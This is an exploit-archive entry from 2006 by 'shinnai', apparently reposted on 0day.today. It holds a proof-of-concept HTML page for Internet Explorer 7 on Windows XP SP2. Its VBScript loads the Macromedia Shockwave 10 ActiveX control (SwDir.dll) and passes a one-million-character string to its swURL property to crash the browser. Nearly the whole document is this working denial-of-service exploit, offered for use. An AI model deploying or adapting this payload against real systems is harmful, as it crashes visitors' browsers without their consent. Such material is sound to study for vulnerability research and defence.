id: 6271
date: 12/29/2006
title: Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
cves: 

=======================================================================
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
=======================================================================




<!--
---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>

argCount = 1

arg1=String(1000000, "A")

ShockW.swURL = arg1

</script>



#  0day.today [2023-03-22]  #